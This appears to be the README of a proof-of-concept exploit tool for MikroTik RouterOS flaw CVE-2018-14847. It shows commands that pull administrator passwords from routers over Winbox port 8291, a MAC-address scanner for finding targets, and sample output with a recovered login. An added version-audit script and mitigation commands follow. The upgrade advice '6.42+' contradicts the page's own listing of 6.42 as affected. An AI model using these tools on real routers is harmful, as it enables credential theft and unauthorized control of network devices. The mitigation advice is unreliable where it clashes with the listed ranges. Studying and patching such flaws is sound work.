Proof of concept (PoC) for the MikroTik vulnerability CVE-2018-14847 (mainly affecting Winbox). It works by reading the password directly from RouterOS over the default port 8291.
Original by: https://github.com/BigNerd95/
- Python 3+
apt install python3
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
e.g.:
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123
You can also use this script without an IP address.
Use MACServerDiscover.py to scan for routers.
python3 MACServerDiscover.py
e.g.:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Exploitation:
python3 MACServerExploit.py <MAC-ADDRESS>
e.g.:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: oppaidaisuki123
RouterOS releases from 2015-05-28 to 2018-04-20
RouterOS versions:
- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3
More information: https://blog.mikrotik.com/security/winbox-vulnerability.html
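To find which devices in an inventory fall inside the affected ranges listed above, a version check like the following can be used. This is an added example, not part of the original repository; the device names and inventory layout are constructed, and the range bounds are assumed to be inclusive exactly as listed on this page.

```python
import re

# Affected ranges as listed on this page, treated as inclusive (assumption).
AFFECTED = {
    "longterm": ("6.30.1", "6.40.7"),
    "stable": ("6.29", "6.42"),
    "beta": ("6.29rc1", "6.43rc3"),
}

_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?$")


def parse_version(text):
    """Convert '6.40.7' or '6.43rc3' into a tuple that sorts in release order."""
    match = _VERSION.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised RouterOS version: {text!r}")
    major, minor, patch, rc = match.groups()
    # A release candidate precedes the final release with the same number,
    # so rc builds sort as (0, n) and final releases as (1, 0).
    stage = (0, int(rc)) if rc else (1, 0)
    return (int(major), int(minor), int(patch or 0), stage)


def is_affected(version, channel):
    """True if version falls inside the page's range for that release channel."""
    low, high = AFFECTED[channel]
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def audit(inventory):
    """Return the names of devices that need the mitigations on this page."""
    return [d["name"] for d in inventory if is_affected(d["version"], d["channel"])]


# Constructed sample inventory (hypothetical device names).
SAMPLE_INVENTORY = [
    {"name": "branch-rtr-01", "version": "6.40.7", "channel": "longterm"},
    {"name": "branch-rtr-02", "version": "6.40.8", "channel": "longterm"},
    {"name": "core-rtr-01", "version": "6.42", "channel": "stable"},
    {"name": "lab-rtr-01", "version": "6.43rc3", "channel": "beta"},
    {"name": "lab-rtr-02", "version": "6.43rc4", "channel": "beta"},
]

if __name__ == "__main__":
    for name in audit(SAMPLE_INVENTORY):
        print(f"{name}: affected, upgrade or restrict Winbox access")
```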
- Upgrade RouterOS to 6.42+
- Disable Winbox
- Restrict the Winbox service to allowed source addresses:
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
- Filter rules (ACL), block port 8291:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
- Restrict Winbox login access via MAC address:
/tool mac-server mac-winbox